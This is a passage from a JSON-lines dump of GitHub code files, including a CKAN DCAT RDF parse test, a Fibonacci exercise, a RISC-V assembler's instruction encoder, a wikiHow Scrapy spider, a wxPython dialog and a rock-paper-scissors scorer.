显示影像(阵列)","repo_name":"beardad1975/py4t","sub_path":"source/cv4t_example/camera_slice.py","file_name":"camera_slice.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"23377315012","text":"# -*- coding: utf-8 -*-\nimport nose\nimport json\nfrom ckanext.dcat.processors import RDFParser\nfrom ckanext.dcatapchharvest.tests.base_test_classes import BaseParseTest\n\neq_ = nose.tools.eq_\nassert_true = nose.tools.assert_true\n\n\nclass ConformantProfileParseTest(BaseParseTest):\n def test_dcatap_conformant_landing_page_import(self):\n contents = self._get_file_contents('conformant/dataset-landing-page.xml')\n p = RDFParser(profiles=['swiss_dcat_ap'])\n p.parse(contents)\n dataset = [d for d in p.datasets()][0]\n eq_(dataset['url'], u\"https://www.bfs.admin.ch/bfs/de/home/statistiken.html\")\n\n def test_dcatap_conformant_publisher_import(self):\n contents = self._get_file_contents('conformant/dataset-publisher.xml')\n p = RDFParser(profiles=['swiss_dcat_ap'])\n p.parse(contents)\n dataset = [d for d in p.datasets()][0]\n publisher = json.loads(dataset['publisher'])\n eq_(publisher['name'], 'Landesamt Topographie Swisstopo')\n eq_(publisher['url'], 'https://swisstopo')\n","repo_name":"opendata-swiss/ckanext-dcatapchharvest","sub_path":"ckanext/dcatapchharvest/tests/test_dcatap_ch_parse_conformant_rdf.py","file_name":"test_dcatap_ch_parse_conformant_rdf.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"32851903838","text":"# 2. Дано натуральное число A > 1.\n# Определите, каким по счету числом Фибоначчи\n# оно является, то есть выведите такое число n,\n# что φ(n)=A. 
Если А не является числом Фибоначчи, выведите число -1.\n\n# 1 2 3 4 5 6 7 8 9 10 11\n# 0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55\n\nfibo_n = int(input())\ncount = 2\na = 0\nb = 1\n\nwhile fibo_n >= b:\n    if fibo_n == b:\n        print(count)\n        break\n    a, b = b, a + b\n    count += 1\nelse:\n    print(-1)\n\n# решение через золотое сечение\n\n# number = int(input(\"Введите число: \"))\n# result = 1\n# count = 3\n# if number == 1:\n# \tprint(\"Номер будет и 2 и 3\")\n# elif number == 0:\n# \tprint(\"Первый номер\")\n# else:\n# \twhile result < number:\n# \t\tcount += 1\n# \t\tif result == number:\n# \t\t\tbreak\n# \t\tresult = int(round(1.68 * result, 0))\n# \t\tprint(result)\n# \tprint(\"Номер будет: \", count)","repo_name":"ElenaLuKa/Python_course","sub_path":"Lesson_2/Seminar_2/Task Se 2_2.py","file_name":"Task Se 2_2.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20581638368","text":"\nfrom pprint import pprint\n\nSizeOfInstruction = 4 # in bytes\nDEBUG = False\n\ndef debug(msg, blankline=False):\n\n\tif DEBUG:\n\t\tif blankline:\n\t\t\tprint()\n\t\telse:\n\t\t\tpprint(msg, indent=4)\n\n\"\"\"\nThere are 6 formats of instructions in RISC-V and each instruction\nbelongs to one of the 6 formats.\n\nDesign: \n\t\tInstruction is base class of 6 classes, implementing each\n\t\tof the 6 instruction formats of RISC-V.\n\t\t\n\t\t6 derived classes of Instruction class:\n\t\t\t- R_Inst\n\t\t\t- I_Inst\n\t\t\t- S_Inst\n\t\t\t- SB_Inst\n\t\t\t- U_Inst\n\t\t\t- UJ_Inst\n\"\"\"\nclass Instruction:\n\n\tinstruction = \"\" # instruction as string\n\ttokensOfInstruction = [] # instruction.split(' ')\n\topcode = \"\" # like addi, lw, sw...\n\n\topcodeInBinary = \"\" # last 7 bits of binaryInstruction\n\tbinaryInstruction = \"\" # final 32 bit binary Instruction as string\n\n\t# dictOfFields: only for debugging purpose\n\t# \t(key, value) = (field, binary value of field)\n\t# \texample:\n\t# \t\t\t{\n\t# \t\t\t\t\"immediate_7\": {0,1}^7,\n\t# \t\t\t\t\"funct3\": {0,1}^3,\n\t# \t\t\t\t...\n\t# \t\t\t}\n\tdictOfFields = {}\n\n\n\tdef __init__(self, instruction):\n\n\t\tself.instruction = instruction\n\t\tself.instruction = self.instruction.rstrip() # remove whitespace from right side of instruction\n\t\tself.tokensOfInstruction = self.instruction.split()\n\t\tself.opcode = self.tokensOfInstruction[0].lower()\n\t\tself.opcodeInBinary = self.getOpcodeInBinary()\n\n\n\t# returns 7-bit opcode as string depending on the instruction's opcode\n\tdef getOpcodeInBinary(self):\n\t\traise NotImplementedError(\"Must override getOpcodeInBinary()\")\n\n\n\t\"\"\"\n\t- Returns exactly 5-bit binary encoding for each register r0-r31\n\t- maps ra to r1\n\t- regex format of variable register: a string, \"r|R{0-31}|a\"\n\t- Zero bit extended for r0-r15\n\t- It doesn't care about case of register i.e. 
R13 == r13\n\t- It doesn't handle any errors like if register = s12, r342, r-21\n\t\"\"\"\n\tdef getRegisterInBinary(self, register, requiredLength=5):\n\t\t# register[1:] - to ignore 'r/R'\n\t\t# [2:] - bin returns in \"0b...\" format so ignoring first two characters\n\t\tregister = register[1:]\n\n\t\tif register == 'a': # ra mapped to r1\n\t\t\tregister = '1'\n\n\t\tif not (0 <= int(register) <= 31):\n\t\t\traise Exception(\"Unknown register: \" + self.instruction)\n\n\t\tbinaryEncoding = bin(int(register))[2:]\n\t\treturn \"0\" * (requiredLength - len(binaryEncoding)) + binaryEncoding # Zero bit extended\n\n\n\t\"\"\"\n\t- Returns binary encoding of offset/immediate\n\t- Uses 2'complement and so MSB bit extended\n\t- returns exactly \"requiredLength\" number of bits\n\t\"\"\"\n\tdef getImmediateInBinary(self, immediate, requiredLength):\n\n\t\timmediate = int(immediate)\n\n\t\t# if immediate >= 2**(requiredLength - 1) or immediate < -2**(requiredLength - 1) :\n\t\t# \traise Exception(\"Immeditate value overflow: \" + self.instruction)\n\n\t\tisNegative = immediate < 0\n\t\timmediate = abs(immediate)\n\n\t\tbinaryEncoding = bin(immediate)[2:]\n\n\t\tbinaryEncoding = \"0\" * (requiredLength - len(binaryEncoding)) \\\n\t\t\t\t\t\t + binaryEncoding # Zero-bit extended\n\n\t\tif isNegative:\n\t\t\t# convert to 2's complement form using:\n\t\t\t# https://stackoverflow.com/questions/34982608/why-does-this-twos-complement-shortcut-work\n\t\t\tlastIndexOfOne = binaryEncoding.rindex('1')\n\t\t\tbinaryEncoding = ''.join([ str(1 ^ int(i)) for i in binaryEncoding[:lastIndexOfOne] ]) \\\n\t\t\t\t\t\t\t + binaryEncoding[lastIndexOfOne:]\n\n\t\tlength = len(binaryEncoding)\n\t\treturn binaryEncoding[length - requiredLength:length]\n\n\n\t\"\"\"\n\tseparates offset and source register for store/load instruction\n\ti.e. 
offset(rs1) to rs1, offset in tokensOfInstruction\n\tidx = index in tokensOfInstruction where this special format is there\n\n\t\tExample: \n\t\tInstruction = sw r14 8(r2)\n\t\ttokensOfInstruction = [\"sw\", \"r14\", \"8(r2)\"]\n\t\tWe want tokensOfInstruction = [\"sw\", \"r14\", \"r2\", \"8\"]\n\t\"\"\"\n\tdef separateOffsetFromSourceRegister(self, idx):\n\n\t\tif self.opcode in [\"sw\", \"lw\"]:\n\t\t\t# registerWithOffset = \"offset(rs1)\"\"\n\t\t\tregisterWithOffset = self.tokensOfInstruction[idx]\n\t\t\tlength = len(registerWithOffset)\n\n\t\t\tself.tokensOfInstruction.pop()\n\n\t\t\tbracketIdx = registerWithOffset.index('(')\n\t\t\timmediate = registerWithOffset[:bracketIdx]\n\t\t\tregister = registerWithOffset[bracketIdx + 1: length - 1]\n\n\t\t\tself.tokensOfInstruction.extend([register, immediate])\n\n\t\telse:\n\t\t\tpass\n\n\n\tdef getBinaryInstruction(self):\n\t\treturn self.binaryInstruction\n\n\n\t# For debugging only\n\tdef debugInstruction(self):\n\t\tdebug(\"\", blankline=True)\n\t\tdebug(self.instruction)\n\t\tdebug(self.tokensOfInstruction)\n\t\tdebug(self.dictOfFields)\n\t\tdebug(self.binaryInstruction)\n\n\t\treturn\n\n\n\n\"\"\"\nParent class: Instruction\nInstruction of R-format type\n\t- R-format type: instructions using 3 register inputs\n\t- deals with opcodes: [\"add\", \"sub\", \"and\", \"or\", \"xor\", \"sll\", \"sra\"]\nExample: \t\t\topcode rd rs1 rs2\nbinaryInstruction:\tfunct7 | rs2 | rs1 | funct3 | rd | opcode\n\"\"\"\nclass R_Inst(Instruction):\n\n\tfunct7 \t= \"\"\n\tfunct3 \t= \"\"\n\trd = \"\"\n\trs1 = \"\"\n\trs2 = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.rs2 = self.getRegisterInBinary(self.tokensOfInstruction[3])\n\t\tself.funct3 = self.getFunct3()\n\t\tself.funct7 = self.getFunct7()\n\n\t\tself.binaryInstruction = self.funct7 + self.rs2 + self.rs1 \\\n\t\t\t\t\t\t\t\t+ self.funct3 + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"funct7\":self.funct7 ,\n\t\t\t\t\t\t\t \"rs2\":self.rs2 ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"0110011\"\t\t\t\t\t\t\t\t# add, sub, and, or, xor, sll, sra: all have same opcode\n\n\n\tdef getFunct3(self):\n\n\t\tif self.opcode in [\"add\", \"sub\"]:\n\t\t\treturn \"000\"\n\t\telif self.opcode == \"and\":\n\t\t\treturn \"111\"\n\t\telif self.opcode == \"or\":\n\t\t\treturn \"110\"\n\t\telif self.opcode == \"xor\":\n\t\t\treturn \"100\"\n\t\telif self.opcode == \"sll\":\n\t\t\treturn \"001\"\n\t\telif self.opcode == \"sra\":\n\t\t\treturn \"101\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\tdef getFunct7(self):\n\t\tif self.opcode in [\"add\", \"sll\", \"xor\", \"or\", \"and\"]:\n\t\t\treturn \"0\" * 7\n\t\telse:\n\t\t\treturn \"0100000\" # sub, sra\n\n\"\"\"\nParent class: Instruction\nInstruction of I-format type\n\t- I-format type: instructions with immediates and load\n\t- deals with opcodes: [\"addi\", \"lw\", \"jalr\"]\nExample: \t\t\topcode rd rs1 immediate\nbinaryInstruction:\timmediate | rs1 | funct3 | rd | opcode\n\"\"\"\nclass I_Inst(Instruction):\n\n\tfunct3 = \"\"\n\trd = \"\"\n\trs1 = \"\"\n\timmediate = \"\" # 12 
bits\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.separateOffsetFromSourceRegister(-1) # for lw\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.funct3 = self.getFunct3()\n\t\tself.immediate = self.getImmediateInBinary(self.tokensOfInstruction[3], 12)\n\n\t\tself.binaryInstruction = self.immediate + self.rs1 + self.funct3 \\\n\t\t\t\t\t\t\t\t + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate\":self.immediate ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\tif self.opcode == \"addi\":\n\t\t\treturn \"0010011\"\n\t\telif self.opcode == \"lw\":\n\t\t\treturn \"0000011\"\n\t\telif self.opcode == \"jalr\":\n\t\t\treturn \"1100111\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\tdef getFunct3(self):\n\t\tif self.opcode in [\"addi\", \"jalr\"]:\n\t\t\treturn \"000\"\n\t\telif self.opcode == \"lw\":\n\t\t\treturn \"010\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\n\"\"\"\nParent class: Instruction\nInstruction of S-format type\n\t- S-format type: store instructions \n\t- deals with opcodes: [\"sw\"]\nExample: \t\t\topcode rs2 immediate(rs1) \nbinaryInstruction:\timmediate_7 | rs2 | rs1 | funct3 | immediate_5 | opcode\n\"\"\"\nclass S_Inst(Instruction):\n\n\trs1 = \"\"\n\trs2 = \"\"\n\tfunct3 = \"\"\n\timmediate_5 = \"\"\n\timmediate_7 = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.separateOffsetFromSourceRegister(-1) # for sw\n\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.rs2 = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.funct3 = self.getFunct3()\n\n\t\timmediate = self.getImmediateInBinary(self.tokensOfInstruction[3], 12)\n\t\tself.immediate_7 = immediate[:7]\n\t\tself.immediate_5 = immediate[7:]\n\n\t\tself.binaryInstruction = self.immediate_7 + self.rs2 + self.rs1 + self.funct3 \\\n\t\t\t\t\t\t\t\t + self.immediate_5 + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate_7\":self.immediate_7 ,\n\t\t\t\t\t\t\t \"rs2\":self.rs2 ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"immediate_5\":self.immediate_5 ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\tif self.opcode == \"sw\":\n\t\t\treturn \"0100011\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\n\tdef getFunct3(self):\n\t\treturn \"010\" # for sw\n\n\n\"\"\"\nParent class: Instruction\nInstruction of SB-format type\n\t- SB-format type: branch instructions \n\t- deals with opcodes: [\"beq\", \"bne\", \"blt\", \"bge\"]\nExample: \t\t\topcode rs2 rs2 offset \nbinaryInstruction:\timmediate_7 | rs2 | rs1 | funct3 | immediate_5 | opcode\n\"\"\"\nclass SB_Inst(Instruction):\n\n\trs1 = \"\"\n\trs2 = \"\"\n\tfunct3 = \"\"\n\timmediate_5 = \"\"\n\timmediate_7 = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rs1 = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.rs2 = 
self.getRegisterInBinary(self.tokensOfInstruction[2])\n\t\tself.funct3 = self.getFunct3()\n\n\t\t# find rest fields in pass2 of assembler (when class method findOffset is called)\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"1100011\" # beq, bne, blt, bge\n\n\n\tdef getFunct3(self):\n\t\tif self.opcode == \"beq\":\n\t\t\treturn \"000\"\n\t\telif self.opcode == \"bne\":\n\t\t\treturn \"001\"\n\t\telif self.opcode == \"blt\":\n\t\t\treturn \"100\"\n\t\telif self.opcode == \"bge\":\n\t\t\treturn \"101\"\n\t\telse:\n\t\t\traise Exception(\"Unknown Opcode: \" + self.instruction)\n\n\t\"\"\"\n\tinstructionLocationIdx: line number of this instruction in given assembly instructions\n\tlabelsAddressMap: dictionary of (key, value) = (label, line number containing label definition)\n\t\"\"\"\n\tdef findOffset(self, instructionLocationIdx, labelsAddressMap):\n\n\t\t# last element in tokensOfInstruction is label name which we have to replace with relative offset\n\t\tlabelAddress = labelsAddressMap[self.tokensOfInstruction[-1]]\n\t\toffset = (labelAddress - instructionLocationIdx) * SizeOfInstruction\n\t\tself.tokensOfInstruction[-1] = str(offset)\n\n\t\trequiredLength = 13 # we will ignore 1 bit so asking 1 extra\n\t\timmediate = self.getImmediateInBinary(self.tokensOfInstruction[-1], requiredLength)\n\n\t\t\"\"\"\n\t\tissue1: in the manual, LSB is index 0 while in python MSB is index 0\n\t\tissue2: in the manual string[a:b] means b inclusive while we need to add 1 in b\n\t\t \t\tfor same effect\n\n\t\tWorkaround for issue 1:\n\t\t\treverse the immediate first and when taking some substring of this,\n\t\t\treverse again\n\t\tWorkaround for issue 2:\n\t\t\tsimply add 1 when slicing, LOL\n\t\t\"\"\"\n\t\timmediate = immediate[::-1]\n\t\tself.immediate_5 = immediate[1:4 + 1][::-1] + immediate[11][::-1]\n\t\tself.immediate_7 = immediate[12][::-1] + immediate[5:10 + 1][::-1]\n\n\t\tself.binaryInstruction = self.immediate_7 + self.rs2 + self.rs1 + self.funct3 \\\n\t\t\t\t\t\t\t\t + self.immediate_5 + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate_7\":self.immediate_7 ,\n\t\t\t\t\t\t\t \"rs2\":self.rs2 ,\n\t\t\t\t\t\t\t \"rs1\":self.rs1 ,\n\t\t\t\t\t\t\t \"funct3\":self.funct3 ,\n\t\t\t\t\t\t\t \"immediate_5\":self.immediate_5 ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\n\"\"\"\nParent class: Instruction\nInstruction of U-format type\n\t- U-format type: instructions with upper immediates\n\t- deals with opcodes: [\"lui\"]\nExample: \t\t\topcode rd immediate \nbinaryInstruction:\timmediate | rd | opcode\n\"\"\"\nclass U_Inst(Instruction):\n\n\trd = \"\"\n\timmediate = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\t\tself.immediate = self.getImmediateInBinary(self.tokensOfInstruction[2], 20)\n\n\t\tself.binaryInstruction = self.immediate + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate\":self.immediate ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"0110111\" # for lui\n\n\"\"\"\nParent class: Instruction\nInstruction of UJ-format type\n\t- UJ-format type: jump instruction- jal\n\t- deals with opcodes: [\"jal\"]\nExample: \t\t\topcode rd immediate 
\nbinaryInstruction:\timmediate | rd | opcode\n\"\"\"\nclass UJ_Inst(Instruction):\n\n\trd = \"\"\n\timmediate = \"\"\n\n\tdef __init__(self, instruction):\n\n\t\tsuper().__init__(instruction)\n\n\t\tself.rd = self.getRegisterInBinary(self.tokensOfInstruction[1])\n\n\t\t# find rest fields in pass2 of assembler(when class method findOffset is called)\n\n\n\tdef getOpcodeInBinary(self):\n\t\treturn \"1101111\" # jal\n\n\n\t\"\"\"\n\tinstructionLocationIdx: line number of this instruction in given assembly instructions\n\tlabelsAddressMap: dictionary of (key, value) = (label, line number containing label definition)\n\t\"\"\"\n\tdef findOffset(self, instructionLocationIdx, labelsAddressMap):\n\n\t\t# last element in tokensOfInstruction is label name which we have to replace with relative offset\n\t\tlabelAddress = labelsAddressMap[self.tokensOfInstruction[-1]]\n\t\toffset = (labelAddress - instructionLocationIdx) * SizeOfInstruction\n\t\tself.tokensOfInstruction[-1] = str(offset)\n\n\t\trequiredLength = 21 # we will ignore 1 bit so asking 1 extra\n\t\timmediate = self.getImmediateInBinary(self.tokensOfInstruction[-1], requiredLength)\n\t\t\"\"\"\n\t\tissue1: in the manual, LSB is index 0 while in python MSB is index 0\n\t\tissue2: in the manual string[a:b] means b inclusive while we need to add 1 in b\n\t\t \t\tfor same effect\n\n\t\tWorkaround for issue 1:\n\t\t\treverse the immediate first and when taking some substring of this,\n\t\t\treverse again\n\t\tWorkaround for issue 2:\n\t\t\tsimply add 1 when slicing, LOL\n\t\t\"\"\"\n\t\timmediate = immediate[::-1]\n\t\tself.immediate = immediate[20][::-1] + immediate[1:10 + 1][::-1] \\\n\t\t\t\t\t\t + immediate[11][::-1] + immediate[12:19 + 1][::-1]\n\n\t\tself.binaryInstruction = self.immediate + self.rd + self.opcodeInBinary\n\n\t\t# For debugging only\n\t\tself.dictOfFields = {\n\t\t\t\t\t\t\t \"immediate\":self.immediate ,\n\t\t\t\t\t\t\t \"rd\":self.rd ,\n\t\t\t\t\t\t\t \"opcodeInBinary\":self.opcodeInBinary ,\n\t\t\t\t\t\t\t }\n\t\tself.debugInstruction()\n","repo_name":"Sanyam-Agrawal/RISC-V_Simulator","sub_path":"Assembler/instruction.py","file_name":"instruction.py","file_ext":"py","file_size_in_byte":15715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"70559552864","text":"import scrapy\nfrom ..items import WikItem\nfrom urllib.parse import urljoin\n\nclass WikwikSpider(scrapy.Spider):\n name = 'wikwik'\n allowed_domains = ['wikihow.com.tr']\n start_urls = ['https://www.wikihow.com.tr/Kategori:E%C4%9Fitim-ve-%C4%B0leti%C5%9Fim']\n def parse(self, response):\n all_contents = response.xpath('//*[@class=\"thumbnail s-height s-width\"]')\n for content in all_contents:\n link = content.xpath('./a/@href').get()\n yield response.follow(url = link, callback = self.parse_pages)\n next_page = response.xpath('//*[@id=\"cat_all\"]/a[2]/@href').get()\n yield response.follow(url = urljoin('https://www.wikihow.com.tr', next_page), callback=self.parse)\n\n def parse_pages(self, response):\n data = WikItem()\n article=' '\n data['title'] = response.xpath('//h1[contains(@class, \"firstHeading\")]/a/text()').get()\n p_list = response.xpath('//div[@class=\"step\"]/descendant::text()').getall()\n for p in p_list:\n if p == '\\n':\n pass\n else:\n article = article + p\n data['article']=article\n yield 
data\n","repo_name":"CihanErsoy/wikihow-scraping","sub_path":"wik/spiders/wikwik.py","file_name":"wikwik.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"71081866783","text":"##\\file nodelibdlg.py\r\n##\\brief A dialog to browse all child nodes of an object that form a library\r\n\r\nimport wx\r\nimport pynebula\r\n\r\nimport conjurerconfig as cfg\r\n\r\n# File dialog styles\r\nNEW = 1\r\nOPEN = 2\r\nDELETE = 3\r\nSELECT = 4\r\n\r\n# get_node_list function\r\ndef get_node_list(path):\r\n \"\"\"\r\n Lists all child nodes in the library path\r\n \"\"\"\r\n gui_names = []\r\n if (pynebula.exists(str(path))):\r\n obj = pynebula.sel(path)\r\n children = obj.getchildren()\r\n for node in children:\r\n gui_names.append(node.getname())\r\n\r\n return gui_names\r\n\r\n# NodeLibDialog class\r\nclass NodeLibDialog(wx.Dialog):\r\n \"\"\"\r\n Browser for nodes in a given noh path:\r\n \\param parent Parent window\r\n \\param style Style of the dialog (NEW, OPEN, DELETE)\r\n \\param label1 Lowercase node type name\r\n \\param label2 Capitalized node type name\r\n \\param path Hierarchy path to search for subnodes\r\n \"\"\"\r\n\r\n def __init__(self, parent, style, label1, label2, path, default_name=\"\"):\r\n if style == NEW:\r\n title = \"Choose a %s name\" % label1\r\n elif style == OPEN:\r\n title = \"Choose a %s to open\" % label1\r\n elif style == DELETE:\r\n title = \"Choose a %s to delete\" % label1\r\n else:\r\n title = \"Choose a %s\" % label1\r\n wx.Dialog.__init__(\r\n self, \r\n parent, \r\n title=title,\r\n style=wx.DEFAULT_DIALOG_STYLE|wx.RESIZE_BORDER\r\n )\r\n self.style = style\r\n self.path = path\r\n if (pynebula.exists(str(path))):\r\n self.root = pynebula.lookup( str(path) )\r\n else:\r\n self.root = None\r\n\r\n self.list_nodes = wx.ListBox(\r\n self, \r\n -1, \r\n choices = get_node_list(self.path)\r\n )\r\n\r\n if self.style == NEW:\r\n self.label_file = wx.StaticText(\r\n self, \r\n -1, \r\n \"%s name\" % label2\r\n )\r\n self.text_file = wx.TextCtrl(self, -1, default_name)\r\n if self.style == NEW:\r\n ok_caption = \"&New\"\r\n elif self.style == OPEN:\r\n ok_caption = \"&Open\"\r\n elif self.style == DELETE:\r\n ok_caption = \"&Delete\"\r\n else:\r\n ok_caption = \"&OK\"\r\n\r\n self.button_ok = wx.Button(self, -1, ok_caption)\r\n self.button_cancel = wx.Button(self, wx.ID_CANCEL, \"&Cancel\")\r\n\r\n self.__set_properties()\r\n self.__do_layout()\r\n self.__bind_events()\r\n\r\n def __set_properties(self):\r\n # Make the ok button the default one when pressing 'return'\r\n self.button_ok.SetDefault()\r\n # Enable/disable ok button\r\n self.__on_change_name(None)\r\n\r\n def __do_layout(self):\r\n sizer_border = wx.BoxSizer(wx.VERTICAL)\r\n sizer_layout = wx.BoxSizer(wx.VERTICAL)\r\n sizer_buttons = wx.BoxSizer(wx.HORIZONTAL)\r\n sizer_layout.Add(self.list_nodes, 1, wx.EXPAND)\r\n if self.style == NEW:\r\n sizer_file = wx.BoxSizer(wx.HORIZONTAL)\r\n sizer_file.Add(\r\n self.label_file, \r\n 0, \r\n wx.ALIGN_CENTER_VERTICAL|wx.FIXED_MINSIZE\r\n )\r\n sizer_file.Add(\r\n self.text_file, \r\n 1, \r\n wx.LEFT|wx.FIXED_MINSIZE, \r\n cfg.BORDER_WIDTH\r\n )\r\n sizer_layout.Add(\r\n sizer_file, \r\n 0, \r\n wx.TOP|wx.EXPAND, \r\n cfg.BORDER_WIDTH\r\n )\r\n horizontal_line = wx.StaticLine(\r\n self, \r\n -1, \r\n ( -1, -1 ), \r\n ( -1, -1 ), \r\n wx.LI_HORIZONTAL \r\n )\r\n sizer_layout.Add(\r\n horizontal_line, \r\n 0, \r\n wx.EXPAND|wx.TOP, \r\n cfg.BORDER_WIDTH\r\n )\r\n 
sizer_buttons.Add(\r\n self.button_ok, \r\n 1, \r\n wx.FIXED_MINSIZE\r\n )\r\n sizer_buttons.Add(\r\n self.button_cancel, \r\n 1, \r\n wx.LEFT|wx.FIXED_MINSIZE, \r\n cfg.BORDER_WIDTH\r\n )\r\n sizer_layout.Add(\r\n sizer_buttons, \r\n 0, \r\n wx.TOP|wx.ALIGN_RIGHT, \r\n cfg.BORDER_WIDTH\r\n )\r\n sizer_border.Add(\r\n sizer_layout, \r\n 1, \r\n wx.ALL|wx.EXPAND, \r\n cfg.BORDER_WIDTH\r\n )\r\n self.SetAutoLayout(True)\r\n self.SetSizerAndFit(sizer_border)\r\n self.Layout()\r\n\r\n def __bind_events(self):\r\n self.Bind(wx.EVT_LISTBOX, self.__on_select_node, self.list_nodes)\r\n self.Bind(wx.EVT_LISTBOX_DCLICK, self.__on_ok, self.list_nodes)\r\n if self.style == NEW:\r\n self.Bind(wx.EVT_TEXT, self.__on_change_name, self.text_file)\r\n self.Bind(wx.EVT_BUTTON, self.__on_ok, self.button_ok)\r\n self.Bind(wx.EVT_BUTTON, self.__on_cancel, self.button_cancel)\r\n\r\n def __on_select_node(self, event):\r\n if self.style == NEW:\r\n self.text_file.SetValue( self.list_nodes.GetStringSelection() )\r\n else:\r\n self.__on_change_name(None)\r\n\r\n def __on_change_name(self, event):\r\n # enable the ok button only when there is some input text\r\n if self.style == NEW:\r\n self.button_ok.Enable( self.text_file.GetValue() != \"\" )\r\n else:\r\n self.button_ok.Enable(\r\n self.list_nodes.GetSelection() != wx.NOT_FOUND \r\n )\r\n\r\n if self.style == SELECT:\r\n self.SetTitle( self.list_nodes.GetStringSelection() )\r\n\r\n def __on_ok(self, event):\r\n self.EndModal(wx.ID_OK)\r\n\r\n def __on_cancel(self, event):\r\n self.EndModal(wx.ID_CANCEL)\r\n\r\n def get_guiname(self):\r\n if self.style == NEW:\r\n return self.text_file.GetValue()\r\n else:\r\n return self.list_nodes.GetStringSelection()\r\n\r\n def node_exists(self):\r\n return self.get_node() is not None\r\n\r\n def get_node(self):\r\n if self.root is None:\r\n return None\r\n else:\r\n return self.root.find(\r\n str( self.get_guiname() ) \r\n )\r\n","repo_name":"xuebai5/TheZombieEngine","sub_path":"zombie/code/conjurer/conjurer/gui/nodelibdlg.py","file_name":"nodelibdlg.py","file_ext":"py","file_size_in_byte":6588,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"7"} +{"seq_id":"33171247241","text":"# Dictionary converting shape to points\nshape_score = {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n}\n\n# Dictionary converting opponents play\n# and our play into outcome points (part 1)\noutcome_dict = {\n \"A\": {\n \"X\": 3,\n \"Y\": 6,\n \"Z\": 0\n },\n \"B\": {\n \"X\": 0,\n \"Y\": 3,\n \"Z\": 6\n },\n \"C\": {\n \"X\": 6,\n \"Y\": 0,\n \"Z\": 3\n }\n}\n\n# Dictionary converting opponents play\n# and result into shape points (part 2)\nresult_to_choice = {\n \"A\": {\n \"X\": 3,\n \"Y\": 1,\n \"Z\": 2\n },\n \"B\": {\n \"X\": 1,\n \"Y\": 2,\n \"Z\": 3\n },\n \"C\": {\n \"X\": 2,\n \"Y\": 3,\n \"Z\": 1\n }\n}\n\n# Dictionary converting result into outcome points\nresult_points = {\n 